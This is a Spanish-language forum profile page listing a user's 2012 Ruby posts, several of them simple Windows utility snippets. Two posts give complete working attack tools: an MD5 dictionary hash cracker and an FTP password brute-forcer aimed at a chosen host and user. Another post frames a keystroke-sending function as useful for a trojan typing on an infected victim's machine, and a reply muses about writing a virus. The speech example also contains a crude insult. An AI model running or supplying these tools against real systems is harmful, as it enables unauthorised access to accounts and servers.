Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - BigBear

#391
Scripting / Re: [Ruby] Funcion send()
11 Febrero 2012, 00:25 AM
me referia al uso que se le pueda dar , por ejemplo hacer que los programas se manejen y escriban solos como lo hace la instalacion de XP coloso , o se podria hacer un virus que escriba solo y esas cosas , a eso me referia.
#392
Foro Libre / Re: Amor del geek !
11 Febrero 2012, 00:13 AM
Cita de: skapunky en 11 Febrero 2012, 00:09 AM
Es marketing claramente...es una aplicación...para que programar una aplicación entera pudiendo enviarle una postal hecha por ejemplo con photoshop? Nadie aprende a hacer eso en 2 meses.

no lo habia pensado asi , pero pueda que sea cierto.
#393
Scripting / Re: [Ruby] Funcion send()
10 Febrero 2012, 23:59 PM
y si , pero no se si eso es bueno o malo xD.
#394
Scripting / [Ruby] CrackHash 0.1
10 Febrero 2012, 21:04 PM
Un simple codigo en ruby para crackear un hash md5 con un diccionario.

Código (ruby) [Seleccionar]

#!usr/bin/ruby
#CrackHash 0.1
#Coded By Doddy H
#Test with 202cb962ac59075b964b07152d234b70 = 123

require "digest/md5"

def openwords(file)
  if File.file?(file)
    print "\n[+] Opening file\n\n"
    ar = File.open(file)
    lineas = ar.readlines
    ar.close
    print "[+] Number of words : ",lineas.length,"\n\n"
    return lineas
  else
    print "[-] Error opening file\n"
  end
end

def sintax()
  print "\n[+] ruby crack.rb <hash> <wordlist>\n"
end

def head()
  print "\n-- == CrackHash 0.1 == --\n\n"
end

def copyright()
  print "\n\n(C) Doddy Hackman 2012\n"
  exit(1)
end

hash = ARGV[0]
wordlist = ARGV[1]

head()

if !hash and !wordlist
  sintax()
else
  if hash.length ==32
    words = openwords(wordlist)
    print "\n[+] Cracking hash...\n\n"
    words.each do |word|
      word = word.chomp
      if Digest::MD5.hexdigest(word) == hash
        print "\a\a\n[+] Hash cracked : ",word,"\n"
        copyright()
      end     
    end
    print "\n[-] Hash not found\n\n"
  else
    print "\n[-] Hash invalid\n\n"
    copyright()     
  end
end

copyright()


# The End ?
#395
Scripting / [Ruby] FTP Crack 0.1
10 Febrero 2012, 21:04 PM
Un simple codigo en ruby para crackear un server FTP mediante un diccionario.

Código (ruby) [Seleccionar]

#!usr/bin/ruby
#FTP Crack 0.1
#Coded By Doddy H

require "net/ftp"

def openwords(file)
  if File.file?(file)
    print "\n[+] Opening file\n\n"
    ar = File.open(file)
    lineas = ar.readlines
    ar.close
    print "[+] Number of words : ",lineas.length,"\n\n"
    return lineas
  else
    print "[-] Error opening file\n"
  end
end

def sintax()
  print "\n[+] ruby ftpcrack.rb <host> <user> <wordlist>\n"
end

def head()
  print "\n-- == FTP Crack 0.1 == --\n\n"
end

def copyright()
  print "\n\n(C) Doddy Hackman 2012\n"
  exit(1)
end

host = ARGV[0]
user = ARGV[1]
wordlist = ARGV[2]

head()

if !host and !user and !wordlist
  sintax()
else
  words = openwords(wordlist)
  print "\n[+] Cracking ...\n\n"
  words.each do |word|
    word = word.chomp
    begin
    ftp =Net::FTP.new(host,user,word)
    rescue Net::FTPPermError
    else
      print "\a\a\n[+] Password Cracked : ",word,"\n"
      copyright()
    end
  end
  print "\n[-] Pass not found\n"
end

copyright()

# The End ?
#396
Scripting / [Ruby] Funcion cambiarfondo()
10 Febrero 2012, 21:03 PM
Una simple funcion en ruby para cambiar el fondo de Windows, lo eh probado en window seven y anda bien.

Código (ruby) [Seleccionar]

#!usr/bin/ruby
#Funcion cambiarfondo()
#Based on a code of protos

require "Win32API"

def cambiarfondo(imagen)
  fondo = Win32API.new("user32", "SystemParametersInfo", ['L', 'L', 'P', 'L'], 'L')
  fondo.Call(20, 0, imagen, 0)
end

cambiarfondo("fondo/test.jpg");

#The End ?
#397
Scripting / [Ruby] Funcion openwords()
10 Febrero 2012, 21:03 PM
Una simple funcion en ruby para cargar un archivo de texto , la funcion retorna un array con las palabras encontradas en el archivo de texto.

Código (ruby) [Seleccionar]

#!usr/bin/ruby
#Funcion openwords()
#Coded By Doddy H

def openwords(file)
  if File.file?(file)
    print "[+] Opening file\n\n"
    ar = File.open(file)
    lineas = ar.readlines
    ar.close
    print "[+] Number of words : ",lineas.length,"\n\n"
    return lineas
  else
    print "[-] Error opening file\n"
  end
end

words = openwords("test.txt")
words.each do |word|
  word = word.chomp
  print "[+] Word : ",word
end

#The End ?
#398
Scripting / [Ruby] Funcion savefile()
10 Febrero 2012, 21:02 PM
Una simple funcion en ruby para escribir en un archivo de texto.

Código (ruby) [Seleccionar]

#!usr/bin/ruby
#Funcion savefile()
#Coded By Doddy H

def savefile(file,text)
  save = File.open(file, "a")
  save.puts text+"\n"
  save.close
end

savefile("test.txt","probando")

#The End ?


#399
Scripting / [Ruby] Funcion send()
10 Febrero 2012, 19:02 PM
Una funcion para mandar teclas , es una funcion interesante si estas pensando en un troyano ya que podrian escribir de forma remota en el teclado de la persona infectada por dicho troyano.

Código (ruby) [Seleccionar]

#!usr/bin/ruby
#Funcion send()
#Coded By Doddy H

require "win32ole"

def send(decir)
  test = WIN32OLE.new('Wscript.Shell')
  test.SendKeys(decir)
end

send("no tengas miedo.....")

# The End ?
#400
Scripting / [Ruby] Funcion speak()
10 Febrero 2012, 19:02 PM
Una simple funcion para hacer hablar a la computadora , no se emocionen solo habla en ingles , cabe destacar que este funcion no anda en Window Seven , pero si en Vista y XP.

Código (ruby) [Seleccionar]

#!usr/bin/ruby
#Funcion speak()
#Coded by Doddy H

require "win32ole"

def speak(text)
  test = WIN32OLE.new("SAPI.Spvoice")
  test.Speak(text)
end

speak("Hi stupid ,i like fuck your mother")

#The End ?